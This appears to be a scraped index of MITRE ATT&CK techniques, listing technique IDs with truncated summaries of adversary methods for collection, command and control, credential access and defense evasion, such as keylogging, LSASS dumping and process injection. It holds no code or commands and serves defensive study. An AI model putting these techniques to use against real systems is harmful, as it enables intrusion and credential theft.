T1005
CollectionData from Local System
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest …
T1025
CollectionData from Removable Media
Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media …
T1039
CollectionData from Network Shared Drive
Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared …
T1056
CollectionInput Capture
Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different …
T1056.001
CollectionKeylogging
Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access …
T1056.002
CollectionGUI Input Capture
Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional …
T1056.003
CollectionWeb Portal Capture
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log …
T1056.004
CollectionCredential API Hooking
Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or …
T1074
CollectionData Staged
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one …
T1074.001
CollectionLocal Data Staging
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files …
T1074.002
CollectionRemote Data Staging
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in …
T1113
CollectionScreen Capture
Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included …
T1114
CollectionEmail Collection
Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to …
T1114.001
CollectionLocal Email Collection
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such …
T1114.002
CollectionRemote Email Collection
Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with …
T1114.003
CollectionEmail Forwarding Rule
Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, …
T1115
CollectionClipboard Data
Adversaries may collect data stored in the clipboard from users copying information within or between applications. For example, on Windows adversaries can access clipboard data …
T1119
CollectionAutomated Collection
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use …
T1123
CollectionAudio Capture
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for …
T1125
CollectionVideo Capture
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the …
T1185
CollectionBrowser Session Hijacking
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various …
T1213
CollectionData from Information Repositories
Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information …
T1213.001
CollectionConfluence
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, …
T1213.002
CollectionSharepoint
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about …
T1213.003
CollectionCode Repositories
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted …
T1213.004
CollectionCustomer Relationship Management Software
Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, …
T1213.005
CollectionMessaging Applications
Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information. The following is a brief list …
T1213.006
CollectionDatabases
Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). Examples …
T1530
CollectionData from Cloud Storage
Adversaries may access data from cloud storage. Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google …
T1560
CollectionArchive Collected Data
An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize …
T1560.001
CollectionArchive via Utility
Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into …
T1560.002
CollectionArchive via Library
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including …
T1560.003
CollectionArchive via Custom Method
An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, …
T1602
CollectionData from Configuration Repository
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control …
T1602.001
CollectionSNMP (MIB Dump)
Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). The …
T1602.002
CollectionNetwork Device Configuration Dump
Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that …
T1001
Command and ControlData Obfuscation
Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are …
T1001.001
Command and ControlJunk Data
Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random …
T1001.002
Command and ControlSteganography
Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data …
T1001.003
Command and ControlProtocol or Service Impersonation
Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web …
T1008
Command and ControlFallback Channels
Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and …
T1024
Command and ControlCustom Cryptographic Protocol
Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a …
T1026
Command and ControlMultiband Communication
**This technique has been deprecated and should no longer be used.** Some adversaries may split communications between different protocols. There could be one protocol for …
T1032
Command and ControlStandard Cryptographic Protocol
Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication …
T1043
Command and ControlCommonly Used Port
**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.** Adversaries may communicate over a commonly used port to bypass firewalls or network detection …
T1065
Command and ControlUncommonly Used Port
Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
T1071
Command and ControlApplication Layer Protocol
Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often …
T1071.001
Command and ControlWeb Protocols
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote …
T1071.002
Command and ControlFile Transfer Protocols
Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote …
T1071.003
Command and ControlMail Protocols
Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the …
T1071.004
Command and ControlDNS
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the …
T1071.005
Command and ControlPublish/Subscribe Protocols
Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and …
T1079
Command and ControlMultilayer Encryption
An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such …
T1090
Command and ControlProxy
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control …
T1090.001
Command and ControlInternal Proxy
Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that …
T1090.002
Command and ControlExternal Proxy
Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to …
T1090.003
Command and ControlMulti-hop Proxy
Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic …
T1090.004
Command and ControlDomain Fronting
Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of …
T1092
Command and ControlCommunication Through Removable Media
Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit …
T1094
Command and ControlCustom Command and Control Protocol
Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols …
T1095
Command and ControlNon-Application Layer Protocol
Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of …
T1102
Command and ControlWeb Service
Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social …
T1102.001
Command and ControlDead Drop Resolver
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, …
T1102.002
Command and ControlBidirectional Communication
Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the …
T1102.003
Command and ControlOne-Way Communication
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the …
T1104
Command and ControlMulti-Stage Channels
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate …
T1105
Command and ControlIngress Tool Transfer
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled …
T1132
Command and ControlData Encoding
Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded …
T1132.001
Command and ControlStandard Encoding
Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and …
T1132.002
Command and ControlNon-Standard Encoding
Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and …
T1172
Command and ControlDomain Fronting
Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of …
T1188
Command and ControlMulti-hop Proxy
To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic …
T1219
Command and ControlRemote Access Tools
An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session …
T1219.001
Command and ControlIDE Tunneling
Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a …
T1219.002
Command and ControlRemote Desktop Software
An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides …
T1219.003
Command and ControlRemote Access Hardware
An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based …
T1483
Command and ControlDomain Generation Algorithms
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list …
T1568
Command and ControlDynamic Resolution
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares …
T1568.001
Command and ControlFast Flux DNS
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single …
T1568.002
Command and ControlDomain Generation Algorithms
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a …
T1568.003
Command and ControlDNS Calculation
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than …
T1571
Command and ControlNon-Standard Port
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or …
T1572
Command and ControlProtocol Tunneling
Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable …
T1573
Command and ControlEncrypted Channel
Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite …
T1573.001
Command and ControlSymmetric Cryptography
Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication …
T1573.002
Command and ControlAsymmetric Cryptography
Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication …
T1665
Command and ControlHide Infrastructure
Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished by identifying and filtering traffic …
T1003
Credential AccessOS Credential Dumping
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. …
T1003.001
Credential AccessLSASS Memory
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, …
T1003.002
Credential AccessSecurity Account Manager
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the …
T1003.003
Credential AccessNTDS
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain …
T1003.004
Credential AccessLSA Secrets
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, …
T1003.005
Credential AccessCached Domain Credentials
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached …
T1003.006
Credential AccessDCSync
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: …
T1003.007
Credential AccessProc Filesystem
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for …
T1003.008
Credential Access/etc/passwd and /etc/shadow
Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of …
T1040
Credential AccessNetwork Sniffing
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the …
T1081
Credential AccessCredentials in Files
Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own …
T1110
Credential AccessBrute Force
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec …
T1110.001
Credential AccessPassword Guessing
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the …
T1110.002
Credential AccessPassword Cracking
Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS …
T1110.003
Credential AccessPassword Spraying
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying …
T1110.004
Credential AccessCredential Stuffing
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username …
T1111
Credential AccessMulti-Factor Authentication Interception
Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, …
T1139
Credential AccessBash History
Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to …
T1141
Credential AccessInput Prompt
When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt …
T1142
Credential AccessKeychain
Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, …
T1145
Credential AccessPrivate Keys
Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto) Adversaries may gather private keys from compromised …
T1167
Credential AccessSecurityd Memory
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these …
T1171
Credential AccessLLMNR/NBT-NS Poisoning and Relay
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based …
T1174
Credential AccessPassword Filter DLL
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method …
T1187
Credential AccessForced Authentication
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. The …
T1208
Credential AccessKerberoasting
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with …
T1212
Credential AccessExploitation for Credential Access
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming …
T1214
Credential AccessCredentials in Registry
The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and …
T1503
Credential AccessCredentials from Web Browsers
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials …
T1522
Credential AccessCloud Instance Metadata API
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance …
T1528
Credential AccessSteal Application Access Token
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make …
T1539
Credential AccessSteal Web Session Cookie
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated …
T1552
Credential AccessUnsecured Credentials
Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, …
T1552.001
Credential AccessCredentials In Files
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store …
T1552.002
Credential AccessCredentials in Registry
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system …
T1552.003
Credential AccessShell History
Adversaries may search the command history on compromised systems for insecurely stored credentials. On Linux and macOS systems, shells such as Bash and Zsh keep …
T1552.004
Credential AccessPrivate Keys
Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, …
T1552.005
Credential AccessCloud Instance Metadata API
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance …
T1552.006
Credential AccessGroup Policy Preferences
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. …
T1552.007
Credential AccessContainer API
Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user …
T1552.008
Credential AccessChat Messages
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such …
T1555
Credential AccessCredentials from Password Stores
Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending …
T1555.001
Credential AccessKeychain
Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive …
T1555.002
Credential AccessSecurityd Memory
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and …
T1555.003
Credential AccessCredentials from Web Browsers
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such …
T1555.004
Credential AccessWindows Credential Manager
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through …
T1555.005
Credential AccessPassword Managers
Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in …
T1555.006
Credential AccessCloud Secrets Management Stores
Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. Secrets managers …
T1556
Credential AccessModify Authentication Process
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, …
T1556.001
Credential AccessDomain Controller Authentication
Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. Malware may be used …
T1556.002
Credential AccessPassword Filter DLL
Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. Windows password filters …
T1556.003
Credential AccessPluggable Authentication Modules
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration …
T1556.004
Credential AccessNetwork Device Authentication
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on …
T1556.005
Credential AccessReversible Encryption
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption …
T1556.006
Credential AccessMulti-Factor Authentication
Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by …
T1556.007
Credential AccessHybrid Identity
Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access …
T1556.008
Credential AccessNetwork Provider DLL
Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to …
T1556.009
Credential AccessConditional Access Policies
Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers …
T1557
Credential AccessAdversary-in-the-Middle
Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), …
T1557.001
Credential AccessLLMNR/NBT-NS Poisoning and SMB Relay
By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity …
T1557.002
Credential AccessARP Cache Poisoning
Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used …
T1557.003
Credential AccessDHCP Spoofing
Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the …
T1557.004
Credential AccessEvil Twin
Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as …
T1558
Credential AccessSteal or Forge Kerberos Tickets
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used …
T1558.001
Credential AccessGolden Ticket
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) …
T1558.002
Credential AccessSilver Ticket
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as …
T1558.003
Credential AccessKerberoasting
Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to …
T1558.004
Credential AccessAS-REP Roasting
Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) Preauthentication offers protection against …
T1558.005
Credential AccessCcache Files
Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's …
T1606
Credential AccessForge Web Credentials
Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud …
T1606.001
Credential AccessWeb Cookies
Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud …
T1606.002
Credential AccessSAML Tokens
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default …
T1621
Credential AccessMulti-Factor Authentication Request Generation
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of …
T1649
Credential AccessSteal or Forge Authentication Certificates
Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages …
T1006
Defense EvasionDirect Volume Access
Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. …
T1009
Defense EvasionBinary Padding
Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. …
T1014
Defense EvasionRootkit
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the …
T1027
Defense EvasionObfuscated Files or Information
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system …
T1027.001
Defense EvasionBinary Padding
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or …
T1027.002
Defense EvasionSoftware Packing
Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. …
T1027.003
Defense EvasionSteganography
Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media …
T1027.004
Defense EvasionCompile After Delivery
Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert …
T1027.005
Defense EvasionIndicator Removal from Tools
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing …
T1027.006
Defense EvasionHTML Smuggling
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary …
T1027.007
Defense EvasionDynamic API Resolution
Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses …
T1027.008
Defense EvasionStripped Payloads
Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables …
T1027.009
Defense EvasionEmbedded Payloads
Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused …
T1027.010
Defense EvasionCommand Obfuscation
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more …
T1027.011
Defense EvasionFileless Storage
Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a …
T1027.012
Defense EvasionLNK Icon Smuggling
Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) …
T1027.013
Defense EvasionEncrypted/Encoded File
Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal …
T1027.014
Defense EvasionPolymorphic Code
Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing …
T1027.015
Defense EvasionCompression
Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple …
T1027.016
Defense EvasionJunk Code Insertion
Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it …
T1027.017
Defense EvasionSVG Smuggling
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or …
T1036
Defense EvasionMasquerading
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the …
T1036.001
Defense EvasionInvalid Code Signature
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a …
T1036.002
Defense EvasionRight-to-Left Override
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is …
T1036.003
Defense EvasionRename Legitimate Utilities
Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may …
T1036.004
Defense EvasionMasquerade Task or Service
Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler …
T1036.005
Defense EvasionMatch Legitimate Resource Name or Location
Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the …
T1036.006
Defense EvasionSpace after Filename
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app …
T1036.007
Defense EvasionDouble File Extension
Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary …
T1036.008
Defense EvasionMasquerade File Type
Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types …
T1036.009
Defense EvasionBreak Process Trees
An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship …
T1036.010
Defense EvasionMasquerade Account Name
Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although …
T1036.011
Defense EvasionOverwrite Process Arguments
Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating …
T1036.012
Defense EvasionBrowser Fingerprint
Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time …
T1045
Defense EvasionSoftware Packing
Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. …
T1054
Defense EvasionIndicator Blocking
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft …
T1055
Defense EvasionProcess Injection
Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing …
T1055.001
Defense EvasionDynamic-link Library Injection
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method …
T1055.002
Defense EvasionPortable Executable Injection
Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method …
T1055.003
